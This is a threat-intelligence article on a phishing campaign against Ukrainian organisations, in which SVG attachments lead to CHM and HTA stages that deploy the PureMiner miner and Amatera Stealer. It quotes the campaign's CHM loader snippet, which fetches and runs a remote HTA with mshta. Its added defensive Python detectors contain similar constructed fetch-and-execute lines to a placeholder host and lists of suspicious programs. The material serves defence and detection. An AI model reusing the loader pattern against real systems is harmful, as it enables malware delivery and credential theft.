In recent weeks, a sophisticated phishing campaign has emerged, targeting organizations in Ukraine with malicious Scalable Vector Graphics (SVG) files designed to propagate the PureMiner cryptominer and a data-stealing payload dubbed Amatera Stealer.
Attackers masquerade as the Ukrainian police, sending emails that claim recipients have pending appeals.
When victims open the attached SVG, it triggers a fileless attack chain that ultimately compromises system confidentiality and hijacks computing resources.
The use of SVG attachments as the initial infection vector shows how attackers keep reaching for file types that traditional email filters and endpoint protections treat as harmless images.
Upon opening the SVG attachment, an embedded HTML iframe element silently loads a second SVG from an attacker-controlled domain.
That SVG presents a spoofed Adobe Reader interface with a “Please wait, your document is loading…” message in Ukrainian, while simultaneously downloading a password-protected archive.
Victims are shown the archive password and urged to extract a Compiled HTML Help (CHM) file. Fortinet analysts noted the malware’s reliance on this deceptive user interaction to evade detection and lure victims into executing malicious content.
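As an added example (not code from the article or from Fortinet), the Python inspector below flags the markers an SVG attachment of this kind would show: elements that let an "image" carry HTML or script (foreignObject, iframe, script, object, embed), inline event-handler attributes, and href/src links to hosts outside an allow-list. The sample SVG and the host attacker.example are constructed for illustration.

```python
# Added example: a static inspector for SVG attachments. This is not code from
# the article or from Fortinet; the sample SVG and the host attacker.example
# are constructed to mirror the chain described above.
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

# Elements that let an "image" carry HTML or script, as in the campaign's iframe trick.
SUSPECT_TAGS = {"script", "foreignObject", "iframe", "object", "embed"}
# Attributes that can point at a remote resource.
LINK_ATTRS = {"href", "src", "data"}


def _local(name: str) -> str:
    """Strip the {namespace} prefix ElementTree puts on tag and attribute names."""
    return name.split("}")[-1]


def inspect_svg(data: bytes, trusted_hosts=()) -> list:
    """Return a list of findings; an empty list means nothing suspicious was seen.

    For untrusted input in production, parse with defusedxml instead of the
    stdlib parser to avoid entity-expansion attacks.
    """
    findings = []
    root = ET.fromstring(data)
    for el in root.iter():
        tag = _local(el.tag)
        if tag in SUSPECT_TAGS:
            findings.append(f"element:{tag}")
        for attr, value in el.attrib.items():
            name = _local(attr)
            if name.lower().startswith("on"):            # onload=, onclick=, ...
                findings.append(f"handler:{tag}.{name}")
            elif name in LINK_ATTRS:
                host = urlparse(value.strip()).hostname
                if host and host not in trusted_hosts:   # fragment/data: URIs have no host
                    findings.append(f"remote:{tag}->{host}")
    return findings


# Constructed sample: an SVG whose foreignObject wraps an iframe that pulls a
# second-stage SVG from an attacker-controlled host.
MALICIOUS_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg" width="800" height="600">
  <rect width="800" height="600" fill="white"/>
  <foreignObject width="800" height="600">
    <iframe xmlns="http://www.w3.org/1999/xhtml" src="https://attacker.example/stage2.svg"
            width="800" height="600" style="border:0"></iframe>
  </foreignObject>
</svg>"""

# Constructed benign sample for comparison.
BENIGN_SVG = b'<svg xmlns="http://www.w3.org/2000/svg"><circle cx="5" cy="5" r="5"/></svg>'

if __name__ == "__main__":
    for label, blob in (("malicious", MALICIOUS_SVG), ("benign", BENIGN_SVG)):
        print(label, inspect_svg(blob))
```

Run it over attachments at the mail gateway or in a sandbox; anything reported under element: or remote: should be detonated or quarantined rather than delivered as an image.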
Inside the archive, the CHM file carries an HTML page with an HTML Help shortcut object that launches an HTML Application (HTA) in hidden mode.
The HTA script, obfuscated with string encoding and array shuffling, acts as a loader: it establishes a persistent connection to the attacker's server, exfiltrates system information in XorBase64-encoded (XOR followed by Base64) HTTP POST requests, and waits for further commands.
Infection Mechanism of PureMiner via an SVG-Based Fileless Chain
A snippet from the malicious HTML page extracted from the CHM shows how calling the shortcut object's Click method runs cmd.exe, which launches mshta.exe to fetch and execute the next-stage HTA:
<OBJECT id="shortcut" classid="clsid:52a2aaae-085d-4187-97ea-8c30db990436" width="1" height="1">
<PARAM name="Command" value="ShortCut">
<PARAM name="Item1" value=",cmd,/c mshta https://ms-team-ping2.com/smtp_test.hta">
</OBJECT>
<SCRIPT>shortcut.Click();</SCRIPT>
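As an added example, not code from the article or from Fortinet, the Python below parses HTML extracted from a CHM (for instance with hh.exe -decompile or 7-Zip) and recovers the command behind every HTML Help shortcut object, flagging those whose arguments reference a remote URL. The sample HTML is constructed after the snippet above, attacker.example is a placeholder host, and the Item1 field is read using the HH shortcut syntax window,program,parameters.

```python
# Added example: a scanner for HTML pages extracted from a CHM that looks for the
# HTML Help "shortcut" object and recovers the command it would run. Not code
# from the article or Fortinet; the sample HTML is constructed after the snippet
# above and attacker.example is a placeholder host.
import re
from html.parser import HTMLParser

# CLSID of the HTML Help ActiveX control (HHCtrl.ocx), which exposes the ShortCut command.
HH_SHORTCUT_CLSID = "52a2aaae-085d-4187-97ea-8c30db990436"
REMOTE_URL = re.compile(r"https?://", re.IGNORECASE)


class _ObjectCollector(HTMLParser):
    """Collect every <object> and the <param> name/value pairs nested in it."""

    def __init__(self):
        super().__init__()
        self.objects = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)  # HTMLParser lowercases tag and attribute names, not values
        if tag == "object":
            self._current = {"classid": (attrs.get("classid") or "").lower(), "params": {}}
            self.objects.append(self._current)
        elif tag == "param" and self._current is not None:
            self._current["params"][attrs.get("name") or ""] = attrs.get("value") or ""

    def handle_endtag(self, tag):
        if tag == "object":
            self._current = None


def find_shortcut_commands(html: str) -> list:
    """Return one dict per HH shortcut object: the program, its arguments and
    whether the arguments reference a remote URL (the mshta download pattern)."""
    parser = _ObjectCollector()
    parser.feed(html)
    hits = []
    for obj in parser.objects:
        if HH_SHORTCUT_CLSID not in obj["classid"]:
            continue
        if obj["params"].get("Command", "").lower() != "shortcut":
            continue
        # Item1 uses the HH shortcut syntax "window,program,parameters": the first
        # field names a window to activate if it is already open and may be empty.
        _window, program, args = (obj["params"].get("Item1", "").split(",", 2) + ["", "", ""])[:3]
        hits.append({"program": program.strip(), "args": args.strip(),
                     "remote": bool(REMOTE_URL.search(args))})
    return hits


# Constructed sample: the loader pattern from the article plus a harmless
# shortcut, to show the scanner separating the two.
SAMPLE_HTM = """<HTML><BODY>
<OBJECT id="shortcut" classid="clsid:52a2aaae-085d-4187-97ea-8c30db990436" width="1" height="1">
  <PARAM name="Command" value="ShortCut">
  <PARAM name="Item1" value=",cmd,/c mshta https://attacker.example/stage2.hta">
</OBJECT>
<OBJECT id="help" classid="clsid:52a2aaae-085d-4187-97ea-8c30db990436">
  <PARAM name="Command" value="ShortCut">
  <PARAM name="Item1" value=",notepad.exe,readme.txt">
</OBJECT>
<SCRIPT>shortcut.Click();</SCRIPT>
</BODY></HTML>"""

if __name__ == "__main__":
    for hit in find_shortcut_commands(SAMPLE_HTM):
        print(hit)
```

The shortcut object is legitimate help-file machinery, so the presence of the CLSID alone is not an indicator; the program and arguments it carries are. A cmd, mshta, powershell or rundll32 program, or any argument containing a URL, is what should raise an alert.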
The infection continues with two separate fileless payload deliveries. In the first, a ZIP archive named ergosystem.zip holds a legitimate .NET tool that side-loads a malicious DLL; the DLL then injects the final payload into another process by process hollowing.
The injected payload, identified as PureMiner, decrypts its configuration from a Protobuf-serialized blob, gathers hardware details using AMD and NVIDIA libraries, and initiates CPU- or GPU-based mining modules.
In the second archive, smtpB.zip, a Python interpreter together with PythonMemoryModule (a library that maps PE files into memory from a byte buffer rather than from disk) loads Amatera Stealer directly into memory.
The stealer fetches an RC4-encrypted configuration with an HTTP GET request, decrypts it in memory, and parses the directives to harvest credentials, browser artifacts, and cryptocurrency wallet files.
From initial SVG deployment to dual payload execution, this campaign exemplifies a seamless progression of fileless tactics and legitimate application misuse.
By weaponizing SVG files as HTML wrappers and chaining through CHM and HTA stages, attackers evade signature-based defenses and exploit users’ trust in common document formats.
Defenders should inspect SVG attachments for embedded iframes, foreignObject and script content, monitor mshta.exe launches (particularly those with a URL on the command line or with hh.exe as an ancestor), and restrict CHM and HTA execution, for example through application control.
URL filtering of the download hosts, gateway policy for password-protected archives (which cannot be scanned in transit), and endpoint behavioural analytics can break this chain before data is stolen or computing resources are hijacked.
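The mshta.exe monitoring recommended above, as an added example in Python that is not from the article or from Fortinet: it runs over constructed, Sysmon-style process-creation records and alerts on mshta.exe launches that fetch a remote HTA or that descend from the HTML Help viewer (hh.exe). The events and the host attacker.example are made up to reproduce the hh.exe to cmd.exe to mshta.exe chain.

```python
# Added example: detection logic over constructed, Sysmon-style process-creation
# records. Not code from the article or Fortinet; the events below are made up to
# reproduce the hh.exe -> cmd.exe -> mshta.exe chain, with attacker.example as a
# placeholder host.
import ntpath
import re

REMOTE_URL = re.compile(r"\bhttps?://", re.IGNORECASE)


def image_name(path: str) -> str:
    """Lower-cased file name of a Windows image path."""
    return ntpath.basename(path).lower()


def ancestry(events: list, pid: int) -> list:
    """Image names from the process itself up through its recorded ancestors."""
    by_pid = {e["pid"]: e for e in events}
    chain = []
    while pid in by_pid:
        chain.append(image_name(by_pid[pid]["image"]))
        pid = by_pid[pid]["ppid"]
    return chain


def detect_mshta_abuse(events: list) -> list:
    """Return (pid, reasons) for each mshta.exe launch that fetches a remote HTA
    or descends from the HTML Help viewer (hh.exe)."""
    alerts = []
    for e in events:
        if image_name(e["image"]) != "mshta.exe":
            continue
        reasons = []
        if REMOTE_URL.search(e["cmdline"]):
            reasons.append("remote_hta")
        if "hh.exe" in ancestry(events, e["pid"])[1:]:
            reasons.append("descends_from_chm")
        if reasons:
            alerts.append((e["pid"], reasons))
    return alerts


# Constructed process-creation records (pid, parent pid, image, command line).
EVENTS = [
    {"pid": 400, "ppid": 1, "image": r"C:\Windows\explorer.exe",
     "cmdline": "explorer.exe"},
    {"pid": 410, "ppid": 400, "image": r"C:\Windows\hh.exe",
     "cmdline": r'"C:\Windows\hh.exe" C:\Users\victim\Downloads\appeal.chm'},
    {"pid": 420, "ppid": 410, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd /c mshta https://attacker.example/stage2.hta"},
    {"pid": 430, "ppid": 420, "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta https://attacker.example/stage2.hta"},
    # A local HTA run by an installer: no remote URL, no hh.exe ancestor, no alert.
    {"pid": 500, "ppid": 400, "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r'mshta.exe "C:\Program Files\Vendor\setup.hta"'},
]

if __name__ == "__main__":
    for pid, reasons in detect_mshta_abuse(EVENTS):
        print(pid, reasons)
```

The ancestry check matters because the cmd.exe hop in the CHM shortcut hides hh.exe from a simple parent-equals rule; walking the full chain catches it, and the local-HTA record shows the rule stays quiet on ordinary installer use.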